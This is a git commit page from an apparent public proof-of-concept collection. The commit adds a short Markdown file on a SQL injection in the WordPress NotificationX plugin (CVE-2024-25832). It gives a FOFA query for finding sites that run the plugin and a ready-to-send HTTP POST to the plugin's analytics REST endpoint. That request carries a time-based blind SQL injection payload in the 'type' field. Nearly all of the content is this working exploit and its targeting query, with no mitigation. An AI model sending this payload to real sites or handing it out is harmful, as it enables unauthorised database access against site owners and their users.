mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md
This commit is contained in:
parent
a45dd827a5
commit
a53115d03c
15
WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md
Normal file
15
WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
## WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832)
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="/wp-content/plugins/notificationx"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /wp-json/notificationx/v1/analytics HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user